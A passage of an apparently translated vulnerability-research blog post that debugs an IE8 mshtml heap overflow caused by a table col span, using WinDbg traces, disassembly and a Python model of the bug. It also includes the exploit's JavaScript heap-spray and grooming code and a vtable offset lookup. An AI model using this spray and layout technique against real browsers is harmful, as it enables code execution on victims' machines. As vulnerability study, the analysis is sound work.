0492af84  00000000 00000000 00000000 00000000
0492af94  00000000 00000000 00000000 00000000
0492afa4  00000000 00000000 00000000 ffffffff
0492afb4  00000001 00000000 00000000 00000000
1:025> dd 07e20f90 
07e20f90  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fa0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fb0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fc0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fd0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fe0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20ff0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e21000  ???????? ???????? ???????? ????????

1:025> !heap -p -a 07e20f90 
    address 07e20f90 found in
    _DPH_HEAP_ROOT @ 171000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 7e71f70:          7e20f90               70 -          7e20000             2000

Also, let's look at spansum and spancmp, the two values used in the comparison.

1:025> dd ebx+54
0492aefc  00000001 00000000 ffffffff 00000000
0492af0c  ffffffff 691c9fd0 00000004 00000004
0492af1c  0497eff0 691c9fd0 00000004 00000004
0492af2c  04936ff0 00000000 00000000 691c9fd0
0492af3c  00000000 00000004 07f27f90 00000000
0492af4c  00000000 00000000 00000000 00000000
0492af5c  00000000 00000000 00000000 000000c8
0492af6c  000000c8 00000000 00000000 00000000
1:025> dd ebx+94
0492af3c  00000000 00000004 07f27f90 00000000
0492af4c  00000000 00000000 00000000 00000000
0492af5c  00000000 00000000 00000000 000000c8
0492af6c  000000c8 00000000 00000000 00000000
0492af7c  00000000 00000000 00000000 00000000
0492af8c  00000000 00000000 00000000 00000000
0492af9c  00000000 00000000 00000000 00000000
0492afac  00000000 ffffffff 00000001 00000000

From the code above, 0x70 bytes were allocated here and the address is stored at CTableLayout+0x9C.
Summary:

  • The first argument of CTableLayout::CalculateMinMax is the CTableLayout object, i.e. the in-memory object for the table tag.
  • CTableLayout+0x54: the sum of the span attribute values, spansum
  • CTableLayout+0x9C: holds vulheap, an allocation of at least 0x70 bytes
  • CTableLayout+0x94: spancmp, compared against spansum; the vulnerable heap block is only allocated when spancmp>>2 is less than spansum.

Things to note
After another g, the "allow ActiveX" dialog appears,

and then we see

I don't know whether this function was triggered again somewhere in between or whether the PoC was re-run; in any case spansum and spancmp are unchanged at this point, 1 and 0 respectively.
I think it was probably triggered again somewhere; it doesn't look like a re-run, but I'm not sure why, since I haven't read this module completely.
In any case, after another g it matches 泉哥's book: spansum is still 1 and spancmp becomes 4.

 

After the memory has been allocated, running over_trigger from the PoC breaks once more in CTableLayout::CalculateMinMax; step in and check the values of spansum and spancmp.

1:025> bl
 0 e 692d018a     0001 (0001)  1:**** mshtml!CTableLayout::CalculateMinMax
 1 e 692d02f2     0001 (0001)  1:**** mshtml!CTableLayout::CalculateMinMax+0x1d3
1:025> bc 1
1:025> bl
 0 e 692d018a     0001 (0001)  1:**** mshtml!CTableLayout::CalculateMinMax

Delete the extra breakpoint set earlier; note that bc takes the breakpoint number.

1:025> g
(c84.e94): Unknown exception - code 80010108 (first chance)
(c84.e94): Unknown exception - code 80010108 (first chance)
(c84.8e8): Unknown exception - code 80010108 (first chance)
(c84.758): Unknown exception - code 80010108 (first chance)
Breakpoint 0 hit
eax=ffffffff ebx=063bbea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff            mov     edi,edi
1:025> dd ebx+54
082e6efc  00000001 ffffffff ffffffff ffffffff
082e6f0c  ffffffff 691c9fd0 00000004 00000004
082e6f1c  0816bff0 691c9fd0 00000004 00000004
082e6f2c  082a2ff0 00000000 00000000 691c9fd0
082e6f3c  00000004 00000004 070f4f90 00000000
082e6f4c  00000000 00000000 00000000 00000000
082e6f5c  00000000 00000000 00000000 000000c8
082e6f6c  000000c8 00000000 00000000 00000000
1:025> dd ebx+94
082e6f3c  00000004 00000004 070f4f90 00000000
082e6f4c  00000000 00000000 00000000 00000000
082e6f5c  00000000 00000000 00000000 000000c8
082e6f6c  000000c8 00000000 00000000 00000000
082e6f7c  00000000 00000000 00000000 00000001
082e6f8c  00000000 00000000 00000000 00000000
082e6f9c  00000000 00000000 00000000 00000000
082e6fac  00000000 ffffffff 00000001 00000000

spansum is 1 and spancmp is 4, so (4>>2) is 1, equal to spansum; the allocation path is skipped and no memory is allocated.

 

But in over_trigger we have set span to 1000, which is the maximum allowed value.
Execution then reaches mshtml!CTableLayout::CalculateMinMax+0x37e. I had originally set a bp there and hit g, but it didn't break (it probably didn't break because I set the breakpoint wrongly and the block containing it was never reached), so I had no choice but to single-step with p, and discovered a new trick: p 10 steps 10 times at once.

1:025> p
eax=08864fd0 ebx=082e6ea8 ecx=00000032 edx=00000000 esi=04f47fac edi=08864fd0
eip=69465a2e esp=0467e410 ebp=0467e4ac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x37e:
69465a2e e8d445dfff      call    mshtml!CTableCol::GetAAspan (6925a007) ---> fetches the column span count; returns 1 here
1:025> p
eax=00000001 --> return value  ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a33 esp=0467e410 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x383:
69465a33 3de8030000      cmp     eax,3E8h ---> span is at most 1000
1:025> p
eax=00000001 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a38 esp=0467e410 ebp=0467e4ac iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
mshtml!CTableLayout::CalculateMinMax+0x388:
69465a38 894510          mov     dword ptr [ebp+10h],eax ss:0023:0467e4bc=00000000
1:025> p
eax=00000001 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a3b esp=0467e410 ebp=0467e4ac iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
mshtml!CTableLayout::CalculateMinMax+0x38b:
69465a3b 7c07            jl      mshtml!CTableLayout::CalculateMinMax+0x394 (69465a44) [br=1]

Set a breakpoint on mshtml!CTableCol::GetAAspan so that it breaks the second time the span value is fetched.

1:025> bp mshtml!CTableCol::GetAAspan
1:025> g
Breakpoint 0 hit
eax=ffffffff ebx=082e6ea8 ecx=00402c02 edx=ffffffff esi=00000000 edi=0467df24
eip=692d018a esp=0467dcc8 ebp=0467dee0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff            mov     edi,edi
1:025> g
Breakpoint 1 hit
eax=08864fd0 ebx=082e6ea8 ecx=00000032 edx=00000000 esi=04f47fac edi=08864fd0
eip=6925a007 esp=0467dc24 ebp=0467dcc4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableCol::GetAAspan:
6925a007 8bff            mov     edi,edi
1:025> gu
eax=000003e8 ---> return value; span is now 0x3e8, i.e. the maximum of 1000 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a33 esp=0467dc28 ebp=0467dcc4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x383:
69465a33 3de8030000      cmp     eax,3E8h

gu runs until the current function returns.
At this point span is already 0x3e8, i.e. the maximum value of 1000.
Let's continue with the code that follows.

.text:74EC5AB3                 call    ?GetPixelWidth@CWidthUnitValue@@QBEHPBVCDocInfo@@PAVCElement@@H@Z ; CWidthUnitValue::GetPixelWidth(CDocInfo const *,CElement *,int)
.text:74EC5AB8                 cmp     [ebp+var_5C], 0
.text:74EC5ABC                 mov     [ebp+var_2C], eax ; ---> computes width, giving copydata = width*100
....
...
...
.text:74EC5B3E                 mov     eax, [ebp+arg_8];----->span=1000
.text:74EC5B41                 imul    ecx, 1Ch---->1000*0x1C
.text:74EC5B44                 add     [ebp+var_38], eax
.text:74EC5B47                 mov     [ebp+var_20], ecx
.text:74EC5B4A                 jmp     short loc_74EC5B4F ; ----> vulheap address
.text:74EC5B4C ; ---------------------------------------------------------------------------
.text:74EC5B4C
.text:74EC5B4C loc_74EC5B4C:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+195A11j
.text:74EC5B4C                 mov     ecx, [ebp+var_20]
.text:74EC5B4F
.text:74EC5B4F loc_74EC5B4F:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959C0j
.text:74EC5B4F                 mov     eax, [ebx+9Ch] ; ----> vulheap address
.text:74EC5B55                 add     eax, ecx ; -----> offset = vulheap + 1000*0x1c > 0x70 (size of vulheap), which ultimately causes the heap overflow!
.text:74EC5B57                 cmp     [ebp+var_1C], 0
.text:74EC5B5B                 mov     [ebp+var_24], eax ; ----> used as an argument to the AdjustForCol call below
.text:74EC5B5E                 jz      short loc_74EC5B7A
.text:74EC5B60                 mov     eax, [ebp+arg_8]
.text:74EC5B63                 cmp     eax, 1
.text:74EC5B66                 jle     short loc_74EC5B7A
.text:74EC5B68                 dec     eax
.text:74EC5B69                 cmp     [ebp+var_14], eax
.text:74EC5B6C                 jnz     short loc_74EC5B7A
.text:74EC5B6E                 imul    eax, [ebp+var_C]
.text:74EC5B72                 mov     ecx, [ebp+var_2C]
.text:74EC5B75                 sub     ecx, eax        ; this
.text:74EC5B77                 mov     [ebp+var_C], ecx
.text:74EC5B7A                 push    [ebp+var_3C]    ; struct CCalcInfo *
.text:74EC5B7D                 mov     eax, [ebp+var_34]
.text:74EC5B80                 push    [ebp+arg_4]     ; int
.text:74EC5B83                 mov     esi, [ebp+var_24]
.text:74EC5B86                 push    [ebp+var_C]     ; ----> the copydata computed from width above, i.e. the data copied into vulheap
.text:74EC5B89                 call    ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)

The copied content is the value width * 100; for example, here it is 0x41, so the copied content is 0x41 * 1000 = 0x1004.
In AdjustForCol, the loop writes into vulheap with a count of 1000 * 0x1c, which finally causes the heap overflow.
One more g and it crashes.


Summary

  1. When the page loads, CTableLayout::CalculateMinMax is called for the first time; the col's span attribute is initialised to 1, so spansum = 1 and spancmp = 0.
  2. Since (spancmp >> 2) < spansum, i.e. 0 < 1, EnsureSizeWorker is called to allocate 0x1c * spansum bytes, but at least a 0x1C * 4 = 0x70-byte block is allocated.
  3. After the allocation, spancmp = spansum * 4 = 4; now (spancmp >> 2) == spansum, i.e. 4/4 == 1, so no further allocation takes place.
  4. over_trigger is called and CTableLayout::CalculateMinMax runs a second time. spansum and spancmp are unchanged, but span has been changed to 1000. When the width * 100 data is copied into the allocated buffer, span is used as the loop counter for writing the vulheap block, but 1000 * 0x1C > 0x70, which finally causes the heap overflow.
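
The four steps above as a small model, added here and not code from the original post or from mshtml.dll: TableLayout and its method names stand in for CTableLayout::CalculateMinMax, EnsureSizeWorker and CTableColCalc::AdjustForCol, keeping only the arithmetic the post traces (0x1C-byte entries, the 4-entry minimum, the spancmp >> 2 check, the 1000 cap); the bounds_check flag is an illustrative mitigation, not the vendor's patch.

```python
ENTRY_SIZE = 0x1C    # bytes per CTableColCalc entry
MIN_ENTRIES = 4      # EnsureSizeWorker never allocates fewer than 4 entries (0x70 bytes)
MAX_SPAN = 1000      # "cmp eax, 3E8h": GetAAspan's result is capped at 1000
COL_WIDTH = 41       # width="41" in the PoC; the value copied per entry is width * 100


class TableLayout:
    """Stand-in for CTableLayout; only the sizing state matters here."""

    def __init__(self):
        self.spansum = 0    # column count taken on the first pass
        self.spancmp = 0    # (spancmp >> 2) == entries already allocated
        self.capacity = 0   # bytes actually allocated for vulheap

    def ensure_size_worker(self):
        """Grow vulheap only while (spancmp >> 2) < spansum."""
        if (self.spancmp >> 2) < self.spansum:
            self.capacity = max(self.spansum, MIN_ENTRIES) * ENTRY_SIZE
            self.spancmp = self.spansum * 4
            return True
        return False   # 4 >> 2 == 1 on the second pass: no reallocation

    def calculate_min_max(self, span, bounds_check=False):
        """One pass. Returns how many bytes AdjustForCol writes past capacity."""
        span = min(span, MAX_SPAN)
        if self.spansum == 0:
            self.spansum = span      # first pass: span is still 1
        self.ensure_size_worker()
        write_bytes = span * ENTRY_SIZE   # loop count is the *current* span
        if bounds_check and write_bytes > self.capacity:
            # Illustrative mitigation (not the vendor's fix): the loop must not
            # run past what EnsureSizeWorker sized from the stale spansum.
            raise OverflowError("span %d needs %#x bytes, vulheap holds %#x"
                                % (span, write_bytes, self.capacity))
        return max(0, write_bytes - self.capacity)


def reproduce(trigger_span=1000, bounds_check=False):
    """Page load (span=1) followed by over_trigger's second CalculateMinMax pass."""
    layout = TableLayout()
    first = layout.calculate_min_max(1)
    second = layout.calculate_min_max(trigger_span, bounds_check)
    return {
        "capacity": layout.capacity,          # 0x70
        "spancmp": layout.spancmp,            # 4
        "copy_value": COL_WIDTH * 100,        # 0x1004, the dword seen in the dump later on
        "first_overflow": first,              # 0
        "second_overflow": second,            # 1000 * 0x1C - 0x70 for the PoC
    }


def is_blocked(trigger_span):
    """True when the bounds check refuses the second pass."""
    try:
        reproduce(trigger_span, bounds_check=True)
    except OverflowError:
        return True
    return False
```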

After debugging, I think 泉哥 misread shr eax, 2 on page 142: shr means shift right, but he wrote the left-shift operator <<.

Implementing the exploit

For how the exploit works, VUPEN's article is more detailed and easier to follow than the 漏洞战争 book, so read that first.
For writing the exp itself, refer to 漏洞战争; here I only do debugging analysis.

<div id="test"></div>
        <script language='javascript'>

        var leak_index = -1;

        var dap = "EEEE";
        while ( dap.length < 480 ) dap += dap;

        var padding = "AAAA";
        while ( padding.length < 480 ) padding += padding;

        var filler = "BBBB";
        while ( filler.length < 480 ) filler += filler;

        //spray
        var arr = new Array();
        var rra = new Array();

        var div_container = document.getElementById("test");
        div_container.style.cssText = "display:none";

        for (var i=0; i < 500; i+=2) {

            // E
            rra[i] = dap.substring(0, (0x100-6)/2);

            // S, bstr = A
            arr[i] = padding.substring(0, (0x100-6)/2);

            // A, bstr = B
            arr[i+1] = filler.substring(0, (0x100-6)/2);

            // B
            var obj = document.createElement("button");
            div_container.appendChild(obj);

        }

        for (var i=200; i<500; i+=2 ) {
            rra[i] = null;
            CollectGarbage();
        }

        </script>

This part is mainly used to build the heap layout; the result is as follows.

Then, starting from the middle (index 200), the EEEE... strings are freed to make room.
The freed slots are there so that, when vulheap is allocated, it lands in one of the freed positions; when the overflow happens it can then reach the strings and the CButtonLayout that follow.

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

Microsoft (R) Windows Debugger Version 6.3.9600.17200 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*
Symbol search path is: srv*
Executable search path is: srv*
ModLoad: 013c0000 01466000   C:\Program Files\Internet Explorer\iexplore.exe
(c0.ea8): Break instruction exception - code 80000003 (first chance)
eax=7ff96000 ebx=00000000 ecx=00000000 edx=77a0d23d esi=00000000 edi=00000000
eip=779a3540 esp=07abfe00 ebp=07abfe2c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
779a3540 cc              int     3
0:021> .childdbg 1
Processes created by the current process will be debugged
0:021> .symfix
0:021> .reload
Reloading current modules
................................................................
...........
0:021> sxe ld:jscript
0:021> g

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*
Symbol search path is: srv*
Executable search path is: srv*
(fd4.630): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0014f620 edx=779b64f4 esi=fffffffe edi=00000000
eip=77a0e60e esp=0014f63c ebp=0014f668 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
77a0e60e cc              int     3
1:014>  lmm jscript
start    end        module name
1:014> g
ModLoad: 6f640000 6f6f2000   C:\Windows\System32\jscript.dll
eax=0345de14 ebx=00000000 ecx=00000007 edx=00000000 esi=7ffda000 edi=0345e22c
eip=779b64f4 esp=0345e144 ebp=0345e198 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
779b64f4 c3              ret
1:023> lmm jscript
start    end        module name
6f640000 6f6f2000   jscript    (deferred)

First attach WinDbg to IE, then enable childdbg. Because IE has not loaded jscript.dll yet at the start, set a break on the loading of jscript.dll (sxe), press g to run, and drag the exp in.
Once lmm confirms it is loaded, set a breakpoint (bp) on JsCollectGarbage and run with g.

1:023> bp jscript!JsCollectGarbage
1:023> g
Breakpoint 0 hit
eax=0345f0f0 ebx=0345f0a0 ecx=0136e0a0 edx=6f6c8555 esi=0136ff40 edi=0345f090
eip=6f6c8555 esp=0345f050 ebp=0345f0b4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
jscript!JsCollectGarbage:
6f6c8555 a180d06d6f      mov     eax,dword ptr [jscript!g_luTls (6f6dd080)] ds:0023:6f6dd080=00000038

Keep setting breakpoints to find where vulheap is allocated; for the detailed analysis see 漏洞战争.

1:023> bl
 0 e 6f6c8555     0001 (0001)  1:**** jscript!JsCollectGarbage
1:023> bd 0
1:023> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"
1:023> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"
1:023> bu jscript!JsStrSubString
1:023> .logopen
Opened log file 'dbgeng.log'

Open a log file to record everything; I also set an extra breakpoint on jscript!JsStrSubString.
In addition, modify the exp a little and add an alert.

<script language='javascript'>
            alert(1);
            var obj_col = document.getElementById("132");
            obj_col.span = 19;

It breaks.

.....
.....
.....
.....
free heap
0156d718  ff ff ff ff ff ff ff ff-80 32 0c 04 00 00 00 00  .........2......
free heap
040c3280  80 59 ed 69 00 00 00 00-00 00 00 00 c7 59 e9 00  .Y.i.........Y..
Breakpoint 5 hit
eax=0375f108 ebx=0375efa0 ecx=02f01318 edx=6eb289cb esi=02f05800 edi=0375f2b4
eip=6eb289cb esp=0375ef50 ebp=0375efb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
jscript!JsStrSubstring:
6eb289cb 8bff            mov     edi,edi
1:025> .logclose
Closing open log file dbgeng.log

After saving, the last vulheap entry in the log is the one we are looking for.

 

Also, to determine the vtable offset, let's just look it up dynamically.

1:027> x mshtml!CButtonLayout::*
6a04519d          mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
6a0c0d9d          mshtml!CButtonLayout::GetInsets (<no parameter info>)
69ff3c90          mshtml!CButtonLayout::`vftable' = <no type information>
6a045499          mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
6a2562f6          mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6a02b4b7          mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69ff9251          mshtml!CButtonLayout::Init (<no parameter info>)
6a045499          mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
6a1c61d8          mshtml!CButtonLayout::s_layoutdesc = <no type information>
6a2562e6          mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
6a256121          mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
6a1c61d1          mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
6a256281          mshtml!CButtonLayout::DoLayout (<no parameter info>)
6a04519d          mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
69ff3af8          mshtml!CButtonLayout::`vftable' = <no type information>
6a02b4f2          mshtml!CButtonLayout::DrawClient (<no parameter info>)
6a0a32da          mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
6a255f61          mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
6a0a32da          mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
6a0c2394          mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)

Oddly, there are two vtables; I don't know why either...

1:027> lmm mshtml
start    end        module name
69e80000 6a432000   mshtml     (pdb symbols)          C:\WinDbg\x86\sym\mshtml.pdb\5B825981E9B445BBB998A27119FF0D6E2\mshtml.pdb

69ff3af8 - 69e80000 = 0x00173af8
This also matches the offset 泉哥's book gives for the Chinese Win7 + IE8 environment.


This is where I got confused...
Also, let's take a look at vulheap.

1:026> db 03f2ae30 l101c
03f2ae30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2ae40  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2ae50  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2ae60  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2ae70  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2ae80  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2ae90  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2aea0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2aeb0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2aec0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2aed0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2aee0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2aef0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af00  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2af10  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2af20  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2af30  04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00  .........a......
03f2af40  02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00  ....H...........
03f2af50  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2af60  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af70  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2af80  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2af90  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2afa0  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2afb0  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2afc0  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2afd0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2afe0  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2aff0  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2b000  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2b010  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2b020  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2b030  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2b040  48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2  H...A... .......
03f2b050  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b060  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b070  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b080  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b090  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b100  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b110  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b120  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b130  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b140  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b150  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b160  05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b170  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b180  70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  p....<.h........
03f2b190  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b1a0  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b1b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1c0  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b1d0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1e0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1f0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b200  00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03  ............(...
03f2b210  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b220  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b230  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b240  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b250  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b260  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b270  00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2  ........f.......
03f2b280  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b290  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b2a0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b2b0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b2c0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b2d0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b2e0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b2f0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b300  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b310  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b320  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b330  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b340  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
